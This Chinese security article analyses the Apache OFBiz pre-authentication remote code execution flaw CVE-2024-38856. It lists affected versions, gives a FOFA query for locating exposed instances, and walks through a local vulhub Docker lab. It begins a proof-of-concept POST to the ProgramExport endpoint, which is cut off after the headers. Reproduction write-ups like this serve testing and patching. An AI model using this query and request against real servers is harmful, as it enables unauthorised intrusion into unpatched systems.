freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

深入分析Apache OFBiz 远程命令执行漏洞0day(CVE-2024-38856)
2024-08-07 22:35:11

1723041212_66b385bc9928f6a717e94.png!small

软件介绍:

Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。

漏洞概述:

Apache OFBiz 开源企业资源规划 (ERP) 系统中披露了一个新的零日预认证远程代码执行漏洞,该漏洞可能允许威胁行为者在受影响的实例上实现远程代码执行。

该漏洞编号为CVE-2024-38856

漏洞版本:

Apache_OFBiz<18.12.15

资产测绘:
FOFA:app="Apache_OFBiz"
搭建测试环境:

使用docker容器进行搭建,镜像下载地址:

https://github.com/vulhub/vulhub

执行如下命令启动一个Apache OfBiz 18.12.09服务器:

git clone https://github.com/vulhub/vulhub.git
cd vulhub
cd ofbiz
cd CVE-2023-49070
docker-compose up -d

1723040735_66b383df1475e4e0c0de3.png!small

如果docker 拉取不起来,请考虑换源或者科学上网。在等待数分钟后,访问https://localhost:8443/accounting查看到登录页面,说明环境已启动成功。但是该容器设定不能外部访问,只能本地访问,因此需要带有桌面的操作系统。

1723040760_66b383f8662c1535a91c8.png!small

1723040769_66b38401573a8aee07394.png!small

至此,环境搭建完成。

漏洞复现:

访问漏洞环境

1723040800_66b38420ec42dd1d9fa67.png!small

poc 如下:

POST /webtools/control/main/ProgramExport HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Type: application/x-www
# 漏洞 # 渗透测试 # 网络安全 # web安全 # 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者